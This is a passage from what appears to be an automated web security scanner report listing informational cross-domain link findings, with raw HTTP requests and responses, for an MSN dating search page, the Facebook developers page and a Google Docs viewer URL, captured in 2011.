<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

17.77. http://dating.msn.com/search/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.msn.com
Path:	/search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.msn.com/search/index.aspx?TrackingID=526133&BannerID=722764&q=man,woman,18,35&gt1=26000

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://download.live.com/?sku=messenger
http://images.match.com/match/doubleblind/xCloseModal.gif
http://images.match.com/match/footer/ico_blg.gif
http://images.match.com/match/footer/ico_fb.gif
http://images.match.com/match/footer/ico_twtr.gif
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif
http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif
http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif
http://images.match.com/match/search/redesign/quickSearchBtn.gif
http://images.match.com/match/search/v2/goBtn.gif
http://match.mediaroom.com/?lid=4
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://sthumbnails.match.com/sthumbnails/05/07/98960507A.jpeg
http://sthumbnails.match.com/sthumbnails/07/38/98990738A.jpeg
http://sthumbnails.match.com/sthumbnails/08/96/98970896B.jpeg
http://sthumbnails.match.com/sthumbnails/19/80/96101980A.jpeg
http://sthumbnails.match.com/sthumbnails/22/02/98992202A.jpeg
http://sthumbnails.match.com/sthumbnails/32/72/97793272E.jpeg
http://sthumbnails.match.com/sthumbnails/36/97/97633697E.jpeg
http://sthumbnails.match.com/sthumbnails/38/51/98953851A.jpeg
http://sthumbnails.match.com/sthumbnails/38/80/98983880A.jpeg
http://sthumbnails.match.com/sthumbnails/47/47/98954747B.jpeg
http://sthumbnails.match.com/sthumbnails/47/99/97584799A.jpeg
http://sthumbnails.match.com/sthumbnails/56/53/97215653B.jpeg
http://sthumbnails.match.com/sthumbnails/59/11/98975911A.jpeg
http://sthumbnails.match.com/sthumbnails/65/98/71866598A.jpeg
http://sthumbnails.match.com/sthumbnails/67/94/98976794A.jpeg
http://sthumbnails.match.com/sthumbnails/68/46/98486846B.jpeg
http://sthumbnails.match.com/sthumbnails/71/47/98987147B.jpeg
http://sthumbnails.match.com/sthumbnails/72/41/98977241B.jpeg
http://sthumbnails.match.com/sthumbnails/75/32/98317532B.jpeg
http://sthumbnails.match.com/sthumbnails/78/67/98977867G.jpeg
http://sthumbnails.match.com/sthumbnails/78/96/98977896G.jpeg
http://sthumbnails.match.com/sthumbnails/91/19/98549119B.jpeg
http://sthumbnails.match.com/sthumbnails/98/29/98989829C.jpeg
http://sthumbnails.match.com/sthumbnails/98/41/98989841A.jpeg
http://success.match.com/index.aspx?lid=4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.domania.com/
http://www.expedia.com/
http://www.getsmart.com/
http://www.hotels.com/
http://www.hotwire.com/
http://www.livenation.com/
http://www.match.com/
http://www.myhomemsn.com/
http://www.ticketmaster.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /search/index.aspx?TrackingID=526133&BannerID=722764&q=man,woman,18,35&gt1=26000 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:31:33 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/1/2011; expires=Wed, 01-Feb-2012 15:31:32 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/1/2011; domain=match.com; expires=Wed, 01-Feb-2012 15:31:32 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/1/2011&UMID=755063e1-2b9c-4da8-8a36-3cd133d03181; expires=Wed, 01-Feb-2012 15:31:32 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=ee7b2afb-a0de-42ba-aad8-f439206ab8a4&THEME=81; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</div>
   <img alt="Search Now" border="0" class="btnQuickSearch" src="http://images.match.com/match/search/redesign/quickSearchBtn.gif" style="height:29px;width:132px;border-width:0px;" />
   <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=fqNLimmZ1Mh%2baW7ibffsug%3d%3d&Handle=mzmartinez28&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/22/02/98992202A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=bAvkKH5UJe286iRCLUZGUw%3d%3d&Handle=kissmegoodnite80&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/07/38/98990738A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=ZIMYmE195IfhCT95E5JHgQ%3d%3d&Handle=Sisforshorty&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/98/41/98989841A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=xOvkT8HZfH0DP%2fWx4MURrg%3d%3d&Handle=Rebeccaterp&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/98/29/98989829C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=4%2fmJIEQxH1jOwW2I%2fGLmBA%3d%3d&Handle=Curlygurly80&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/71/47/98987147B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=wMBdXnDEDPRBe1orO9NmvQ%3d%3d&Handle=lovelyladycg&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/38/80/98983880A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=b%2bH11YGo8iE%2bhVcG428rxg%3d%3d&Handle=laceynaz1985&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/78/96/98977896G.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=oYaVJsYuXeNlHGlsvh8NJg%3d%3d&Handle=marialil_coz&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/78/67/98977867G.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=ZQT8ed6QNCp77nOwVdyiQQ%3d%3d&Handle=lizeth81&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/72/41/98977241B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=K%2fGk823%2fgCq9D1AM5DIBeA%3d%3d&Handle=seriousshygrl83&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/67/94/98976794A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0Z%2bykX6Xeuru41G1byShxA%3d%3d&Handle=tbeadue4u&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/59/11/98975911A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
tl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=x7%2bmp6cyJ3f2pGFYWFtd5g%3d%3d&Handle=marymaryholymary&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/08/96/98970896B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=Cpgb9umXH2nc6dhZtrBsDA%3d%3d&Handle=Amyslivnik&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/05/07/98960507A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=fLjMPht3lK7lkPcsCKN41g%3d%3d&Handle=jillkiss9233&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/47/47/98954747B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=mNqeuXkHkmrZqaKg3ndiwg%3d%3d&Handle=thisfadingstar&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/38/51/98953851A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=QZPsktm5yh0Yx7fmR8lZxg%3d%3d&Handle=live2sing28&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/91/19/98549119B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=xa3cXx57TmUR%2fvNPSo%2bKxw%3d%3d&Handle=azgirl8066&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/68/46/98486846B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=6YiMMtS%2fpvkxbHsRX4t9XQ%3d%3d&Handle=cosibi&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/75/32/98317532B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=fGTm4Zi%2f75orzZ%2fDFXJAsw%3d%3d&Handle=Laurennnn27&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/32/72/97793272E.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
tl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=Ry7kyaVE3a11%2fk2mDIiC%2fQ%3d%3d&Handle=fitnesssweetie&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/36/97/97633697E.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=9qVNeR3tQcJDd0Jqx8g7HA%3d%3d&Handle=scsal13&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/47/99/97584799A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=3JsjAqHGYT5IxY48QI88vA%3d%3d&Handle=vanessamarie7551&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/56/53/97215653B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=cFTDaZzrAToz1ZxRW%2bbFuw%3d%3d&Handle=csilluka8&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/19/80/96101980A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=gQJrDXhc3lRj0Q%2fNLR2mBQ%3d%3d&Handle=loveligcius&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/65/98/71866598A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

17.78. http://developers.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://developers.facebook.com/?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://c.static.ak.fbcdn.net/rsrc.php/y0/r/OtRXPAfGtIS.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/5lDtlA3LiNH.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://c.static.ak.fbcdn.net/rsrc.php/yt/r/D0gN1KGE3TJ.css
http://d.static.ak.fbcdn.net/rsrc.php/ya/r/6YS9n_g72G-.css
http://f.static.ak.fbcdn.net/rsrc.php/yW/r/N2f0JA5UPFU.png
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
http://f.static.ak.fbcdn.net/rsrc.php/yj/r/OxVcA9ghpdG.css
http://f.static.ak.fbcdn.net/rsrc.php/yz/r/D4o7FaFFTzE.css
http://static.ak.fbcdn.net/rsrc.php/y1/r/JTA1uUdYpA4.css
http://static.ak.fbcdn.net/rsrc.php/yY/r/Jg5BMOoX4Y8.css

Request

GET /?ref=pf HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:00 GMT
Content-Length: 13531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<meta property="og:image" content="http://f.static.ak.fbcdn.net/rsrc.php/yA/r/rwsSMfAU1li.png" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yY/r/Jg5BMOoX4Y8.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yz/r/D4o7FaFFTzE.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y1/r/JTA1uUdYpA4.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/5lDtlA3LiNH.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y0/r/OtRXPAfGtIS.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yt/r/D0gN1KGE3TJ.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yj/r/OxVcA9ghpdG.css" />
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/ya/r/6YS9n_g72G-.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...
<a class="logo" href="/"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/yW/r/N2f0JA5UPFU.png" alt="Facebook Developers" width="166" height="17" /></a>
...[SNIP]...

17.79. http://docs.google.com/viewer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.google.com
Path:	/viewer

Issue detail

The page was loaded from a URL containing a query string:

http://docs.google.com/viewer?a=v&q=cache:&hl=en&gl=us&pid=bl&srcid=ADGEESi?hl=en&tab=wo

The response contains the following links to other domains:

http://ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif
http://www.youtube.com/?tab=o1

Request

GET /viewer?a=v&q=cache:&hl=en&gl=us&pid=bl&srcid=ADGEESi?hl=en&tab=wo HTTP/1.1
Host: docs.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 01 Feb 2011 15:31:41 GMT
Expires: Tue, 01 Feb 2011 15:31:41 GMT
